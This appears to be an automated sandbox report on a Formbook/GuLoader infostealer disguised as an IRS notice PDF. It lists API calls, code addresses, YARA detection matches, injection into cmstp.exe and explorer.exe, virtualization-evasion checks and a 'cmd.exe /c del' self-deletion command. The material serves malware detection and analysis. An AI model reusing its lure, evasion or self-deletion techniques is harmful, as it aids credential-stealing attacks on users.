      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005694BD NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005694A5 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056955E NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569579 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569561 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056956D NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569511 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569505 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056953E NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056952D NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005695D5 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005695C6 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005695C9 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005695E1 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569598 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005695B5 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005695A9 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569604 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568FCD NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568FF9 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568FE1 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568FED NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F995D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F996E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F996D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F999A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F995F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99560 NtWriteFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F9AD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F997A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F9A770 NtOpenThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F9A710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F998F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F998A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F9B040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F999D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F9A3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030D8390 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030D8260 NtReadFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030D82E0 NtClose,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030D81B0 NtCreateFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030D825B NtReadFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030D82DB NtClose,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030D81AA NtCreateFile,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_00404282
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_00408AB1
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E256E30
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2FD616
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E302EF7
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E301FF1
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E30DFCE
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24841F
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2FD466
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B477
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4496
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E230D20
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E302D07
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E301D55
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E262581
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F2D82
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24D5E0
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E3025DD
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2EFA2B
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B236
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E3022AE
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4AEF
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E302B28
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2DCB4F
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25AB40
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26EBB0
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26138B
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2E23E3
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F03DA
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2FDBD2
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26ABD8
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E30E824
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A830
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1002
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2620A0
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E3020A8
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24B090
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E3028EC
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E254120
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23F900
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB28F9
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB52FF
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB7062
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB87C7
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB95B2
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB3362
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB2902
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB5302
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05022D07
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05021D55
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_050225DD
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F6841F
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F6D5E0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0501D466
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F82581
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F50D20
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F76E30
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0502DFCE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05021FF1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0501D616
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05022EF7
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F820A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F6B090
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F7A830
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05011002
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0502E824
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F799BF
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_050220A8
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F74120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_050228EC
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F5F900
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05022B28
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0501DBD2
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_050103DA
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0500FA2B
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F8EBB0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_050222AE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F7AB40
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030C2FB0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030C2D8A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030C2D90
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030DC5A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030C8C4B
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030C8C50
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: String function: 1E23B150 appears 136 times
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 04F5B150 appears 72 times
      Source: IRS Notice Letter pdf document.exe, 00000000.00000002.693272578.000000000041A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameklogelig.exe vs IRS Notice Letter pdf document.exe
      Source: IRS Notice Letter pdf document.exe, 00000000.00000002.693439941.00000000021A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs IRS Notice Letter pdf document.exe
      Source: IRS Notice Letter pdf document.exe, 00000001.00000003.750269972.000000000093F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs IRS Notice Letter pdf document.exe
      Source: IRS Notice Letter pdf document.exe, 00000001.00000002.755498311.000000001E32F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs IRS Notice Letter pdf document.exe
      Source: IRS Notice Letter pdf document.exe, 00000001.00000000.692053161.000000000041A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameklogelig.exe vs IRS Notice Letter pdf document.exe
      Source: IRS Notice Letter pdf document.exe, 00000001.00000002.754867271.000000001DD90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs IRS Notice Letter pdf document.exe
      Source: IRS Notice Letter pdf document.exeBinary or memory string: OriginalFilenameklogelig.exe vs IRS Notice Letter pdf document.exe
      Source: IRS Notice Letter pdf document.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000002.1022334778.0000000005467000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000002.1021594863.000000000322D000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@17/7
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_01
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeFile created: C:\Users\user\AppData\Local\Temp\~DF845B25EDF66F8583.TMPJump to behavior
      Source: IRS Notice Letter pdf document.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeProcess created: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
      Source: Binary string: cmstp.pdbGCTL source: IRS Notice Letter pdf document.exe, 00000001.00000003.750269972.000000000093F000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.730789316.0000000005A00000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: IRS Notice Letter pdf document.exe, 00000001.00000002.755014575.000000001E210000.00000040.00000001.sdmp, cmstp.exe, 00000003.00000002.1021841767.0000000004F30000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: IRS Notice Letter pdf document.exe, cmstp.exe
      Source: Binary string: cmstp.pdb source: IRS Notice Letter pdf document.exe, 00000001.00000003.750269972.000000000093F000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.730789316.0000000005A00000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: IRS Notice Letter pdf document.exe PID: 6092, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: IRS Notice Letter pdf document.exe PID: 3788, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: IRS Notice Letter pdf document.exe PID: 6092, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: IRS Notice Letter pdf document.exe PID: 3788, type: MEMORY
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_00415F3E push eax; ret
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_00405F80 push edx; iretd
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D5131 push BB6660BAh; iretd
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D885A push CA8566BAh; retn 001Ch
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2895 push 81D884BAh; ret
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E28D0D1 push ecx; ret
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056885A push CA8566BAh; retn 001Ch
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00565845 push edx; retf
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00565131 push BB6660BAh; iretd
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FAD0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030DB3A5 push eax; ret
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030DB3FB push eax; ret
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030DB3F2 push eax; ret
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030D8F34 push esp; iretd
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030DCC2C push edi; ret
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030DB45C push eax; ret
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2317 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2335
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D237D
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D236C
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2389
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D43B9
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D23D9
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D23CD
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D23C1
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D241D
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2429
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2455
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2452
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D246D
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2461
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D24B9
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D24AD
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D24AA
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D24C5
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005643B9
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005634D1
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005634C5
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005634FD
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00563492
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005634B4
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00563559
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056354D
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056354A
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00563565
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00563515
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00563509
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005635C9
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005635F9
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005635ED
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005635BD
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005635AC
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056365E
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00563648
